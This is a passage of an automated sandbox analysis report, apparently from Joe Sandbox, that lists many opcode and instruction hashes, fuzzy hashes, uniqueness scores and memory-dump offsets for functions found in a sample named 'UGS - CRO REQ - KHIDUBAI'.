                                                                                                                                                    • Opcode ID: 2f9c937b705b733c9644217cffe37b903ab6a11d94893328ab2d7921f8117b8c
                                                                                                                                                    • Instruction ID: 89f7625bcd3042e5662e2b0f59687678129b36ffb3fe7dec0c562e4284fda470
                                                                                                                                                    • Opcode Fuzzy Hash: 2f9c937b705b733c9644217cffe37b903ab6a11d94893328ab2d7921f8117b8c
                                                                                                                                                    • Instruction Fuzzy Hash: 05C04C753042085F9344DA9DD851C26F7E9DBD8614714C06DA90DC7351EA72FD13C694
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 6b890a1878f21bb7f09d862592a755ed2ce311562f5f1a0304c6abbbdd52873e
                                                                                                                                                    • Instruction ID: 19d07928bc24b9474f7e59cbdd8b8e0d3deed1c7a519eb3c8c8690cf2c067a2b
                                                                                                                                                    • Opcode Fuzzy Hash: 6b890a1878f21bb7f09d862592a755ed2ce311562f5f1a0304c6abbbdd52873e
                                                                                                                                                    • Instruction Fuzzy Hash: C5C092303082084B8748D69DE851825F3DA9BCC618328C0BDA80DC7352EE23FC038684
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: e1b71607be9f7235c8a419f509db93f804d2e602e7e6beacc654deb6a87ac8cf
                                                                                                                                                    • Instruction ID: d7becbf3f5380f7f4629b8a054a796af7a7ac4a311b2a79bb75cc144476e1c28
                                                                                                                                                    • Opcode Fuzzy Hash: e1b71607be9f7235c8a419f509db93f804d2e602e7e6beacc654deb6a87ac8cf
                                                                                                                                                    • Instruction Fuzzy Hash: DEC08C3294C1808FD702D3A4CC20004BFB29F6320832C80EBA04DCB6B3E167C8038B10
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 6b890a1878f21bb7f09d862592a755ed2ce311562f5f1a0304c6abbbdd52873e
                                                                                                                                                    • Instruction ID: 19d07928bc24b9474f7e59cbdd8b8e0d3deed1c7a519eb3c8c8690cf2c067a2b
                                                                                                                                                    • Opcode Fuzzy Hash: 6b890a1878f21bb7f09d862592a755ed2ce311562f5f1a0304c6abbbdd52873e
                                                                                                                                                    • Instruction Fuzzy Hash: C5C092303082084B8748D69DE851825F3DA9BCC618328C0BDA80DC7352EE23FC038684
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 46dd1f05550a3644c65c8fdf94474d3b205ec78a8dceb144a2b0e7d8f4782855
                                                                                                                                                    • Instruction ID: c6d45c2b3fa42d69cc29f6e3d767c109718032e65f454f0f3476adc64e2894a3
                                                                                                                                                    • Opcode Fuzzy Hash: 46dd1f05550a3644c65c8fdf94474d3b205ec78a8dceb144a2b0e7d8f4782855
                                                                                                                                                    • Instruction Fuzzy Hash: 57D0C97004E7C0AFC7279B6458654127F716A5330476448DFE8808619BC239C966D756
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: fcf673477d121598f0437963a18f541a67fb99940d387551b119ac9e130d5dae
                                                                                                                                                    • Instruction ID: 744eb2b7f0000a1be69fbdec76d5d04e024677328916547378f49dc2326525f8
                                                                                                                                                    • Opcode Fuzzy Hash: fcf673477d121598f0437963a18f541a67fb99940d387551b119ac9e130d5dae
                                                                                                                                                    • Instruction Fuzzy Hash: 6FD0CAA044D3C14FCB0387309CA8B00BF60AF83602F0A82CBA084AB8A3D2A84508D722
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: e2f3fcc5f626b5b23bbd0ea275c30baec182413ce2fe1741c4543080eb47466c
                                                                                                                                                    • Instruction ID: 3b9fd23479aa10ef2fff0b7cbe20b3e7f0f8641937c59d9e6d4bef238ffdecbf
                                                                                                                                                    • Opcode Fuzzy Hash: e2f3fcc5f626b5b23bbd0ea275c30baec182413ce2fe1741c4543080eb47466c
                                                                                                                                                    • Instruction Fuzzy Hash: D6D0E938A050049FC744CB84D890DA9F772EF88314F29C055AC1557365CA32EC43DB41
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                                                                                    • Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
                                                                                                                                                    • Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                                                                                    • Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                                                                                    • Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
                                                                                                                                                    • Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                                                                                    • Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                                                                                    • Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
                                                                                                                                                    • Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                                                                                    • Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                                                                                    • Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
                                                                                                                                                    • Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                                                                                    • Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                                                                                    • Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
                                                                                                                                                    • Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                                                                                    • Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                                                                                    • Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
                                                                                                                                                    • Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                                                                                    • Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                                                                                    • Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
                                                                                                                                                    • Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                                                                                    • Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                                                                                    • Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
                                                                                                                                                    • Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                                                                                    • Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                                                                                    • Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
                                                                                                                                                    • Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                                                                                    • Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                                                                                    • Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
                                                                                                                                                    • Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                                                                                    • Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                                                                                    • Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
                                                                                                                                                    • Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                                                                                    • Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                                                                                                                    • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                                                                                                                                                    • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                                                                                                                    • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 5b7cfceff21a98199a1ea8a8668d5dec9ef415c6f2e266751c87e6400710a77e
                                                                                                                                                    • Instruction ID: f398565a4d469fe0fc5d7de2e4565db81f59a321f282b3aabce81a220e4a218c
                                                                                                                                                    • Opcode Fuzzy Hash: 5b7cfceff21a98199a1ea8a8668d5dec9ef415c6f2e266751c87e6400710a77e
                                                                                                                                                    • Instruction Fuzzy Hash: A2C04CB4C05255DEDB68DF2598053957BB2FBA4301F2880A7840F92211E7310586AF41
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 00fb257517fa66d8d82df2fc559de156622b6f4f3f56d113648c417e124a9b6c
                                                                                                                                                    • Instruction ID: bde584bcc0a20163e1d20aefd562f14664055d751c7398f878511897cdc0a054
                                                                                                                                                    • Opcode Fuzzy Hash: 00fb257517fa66d8d82df2fc559de156622b6f4f3f56d113648c417e124a9b6c
                                                                                                                                                    • Instruction Fuzzy Hash: DFB012301042084B8100D6C8D841810F39CDB84518314C099980C47302CA23FC038580
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.420080510.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_7d0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: f4e2839fb080d70fd9d5ab266c8ff45246f4c7246a28781672dbb782ec4b6ef3
                                                                                                                                                    • Instruction ID: cfd3c94acb28e12ede7e7a80c62375d018fe088f1f186957f4485c32e65079b3
                                                                                                                                                    • Opcode Fuzzy Hash: f4e2839fb080d70fd9d5ab266c8ff45246f4c7246a28781672dbb782ec4b6ef3
                                                                                                                                                    • Instruction Fuzzy Hash: 6CB092301602088F82009A59E448C0137ACAF08A0434100D0E1088B632C621F8008A51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.420080510.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_7d0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 86bdee94e5692a436ae035627e64b13746d57cd7c7f4352909ec0fa1e64ba9d6
                                                                                                                                                    • Instruction ID: 8d1e96b61da51a86ff123e30a417b08c82b604f31c6c5a8c388ce71e64102012
                                                                                                                                                    • Opcode Fuzzy Hash: 86bdee94e5692a436ae035627e64b13746d57cd7c7f4352909ec0fa1e64ba9d6
                                                                                                                                                    • Instruction Fuzzy Hash: 6FC09B2010D7C4CFC723866459313902F709B07B00F5D88D389819A7D7C10D5416D332
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 496d0f802e1b1dc2c93f70dfafe2c5f07b66e113ae36ebd85902c8d74fb1225d
                                                                                                                                                    • Instruction ID: 46a8281cb2ba43c5890994f586faf0f659945039c255adabb842a3d1801647d6
                                                                                                                                                    • Opcode Fuzzy Hash: 496d0f802e1b1dc2c93f70dfafe2c5f07b66e113ae36ebd85902c8d74fb1225d
                                                                                                                                                    • Instruction Fuzzy Hash: 21A0223000AF0C828200B2B23002028338C088020838000BAA30C0AA220E33E0A08088
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: a3310aa2e261b35d84c2c6ae4815de33f4d41c4c5bddfaa85d8d677339f10b60
                                                                                                                                                    • Instruction ID: 9eb983053df3908c9cbfbe989ae1435fac61beeeaa76844b070ce2a8fff3baab
                                                                                                                                                    • Opcode Fuzzy Hash: a3310aa2e261b35d84c2c6ae4815de33f4d41c4c5bddfaa85d8d677339f10b60
                                                                                                                                                    • Instruction Fuzzy Hash: EFB0927060A2008BDB00EF6194842BA77A39B84200F24903A850646288C63499C39682
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 78295c5b4ae89527a1d14203901987d146d52366f53fc9456bad769984ab1550
                                                                                                                                                    • Instruction ID: 0fca22947913397e6c175a070cdcbb5e7cd669bd97768fca039def9563acfe0f
                                                                                                                                                    • Opcode Fuzzy Hash: 78295c5b4ae89527a1d14203901987d146d52366f53fc9456bad769984ab1550
                                                                                                                                                    • Instruction Fuzzy Hash: 4790023104464C8B85406B95B80A559F75C96545197A04451B50D416125AA564145695
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: ecbf756409264bc92ebdb0b9c9b4dd052f625ec824f2deee09e2cd69db635026
                                                                                                                                                    • Instruction ID: d9bd390cda27181e3a600afb4c38db13529a44ee57ba23af33e6072c0031a2de
                                                                                                                                                    • Opcode Fuzzy Hash: ecbf756409264bc92ebdb0b9c9b4dd052f625ec824f2deee09e2cd69db635026
                                                                                                                                                    • Instruction Fuzzy Hash: 3D902230000A0C8B038023803808082338CC8A02223800020A00C000020B0020000088
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: cab4d2468f251aac62a6e0a5161409fe418866820c8adf738ab73d377e5970c4
                                                                                                                                                    • Instruction ID: cd56d7afd6b2e75c8eace2ab80ca48314e8f08cd305c2ef3e1787eee0505527d
                                                                                                                                                    • Opcode Fuzzy Hash: cab4d2468f251aac62a6e0a5161409fe418866820c8adf738ab73d377e5970c4
